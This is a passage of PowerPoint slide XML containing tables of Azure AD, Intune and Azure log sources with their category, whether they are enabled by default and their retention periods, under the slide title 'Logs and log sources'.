                      <a:endParaRPr lang="en-US" sz="1400" b="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r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Yes</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="140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r>
                        <a:rPr lang="nb-NO" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>30 Days (AAD P1)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2697387040"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="517213">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Users at Risk</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="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400" b="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Azure AD</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1400" b="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400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Yes</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="140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400">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>7 Days (30 Days, P1/P2)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1400">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1739551764"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="517213">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Risky Sign-ins</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="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400" b="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Azure AD</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1400" b="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400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Yes</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="140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400">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>7 Days (30 Days, P1/P2)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1400">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1111579214"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="517213">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Azure MFA Usage</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="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400" b="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Azure AD</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1400" b="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400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Yes</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="140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r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>30 Days </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2246871757"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="517213">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Directory Audit</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="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400" b="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Azure AD</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1400" b="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400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Yes</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="140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r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>7 Days (30 Days, P1/P2)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="22234245"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="490674">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Intune Activity Log</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="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r>
                        <a:rPr lang="nb-NO" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Intune</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="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400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Yes</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="140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r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>1 Year (Graph API)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2093592134"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24634223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45793E-8E14-4A90-BE7D-52C4B0C20EF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Logs and log sources</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="4000" b="1" dirty="0">
              <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4010B07-1478-4273-8289-A68C5CF80ECF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="932802" y="1566401"/>
          <a:ext cx="10077820" cy="4233145"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="2519455">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3680454339"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2519455">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="897638882"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2519455">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="898253443"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2519455">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2403709729"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="437101">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Audit Log</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Category</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Enabled as standard</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">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600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Retention</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1959681576"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437101">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Azure Resource Manager</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="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400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Azure</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="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r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Yes</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="140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r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>30 Days</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3910050608"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437101">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Network Security Group Flow Logs</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="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r>
                        <a:rPr lang="nb-NO" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Azure</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="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r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>No</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="140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latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Depending on Configuration</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4238637081"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="397562">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Azure Diagnostic Logs</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Azure</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>No</a:t>
                      </a:r>
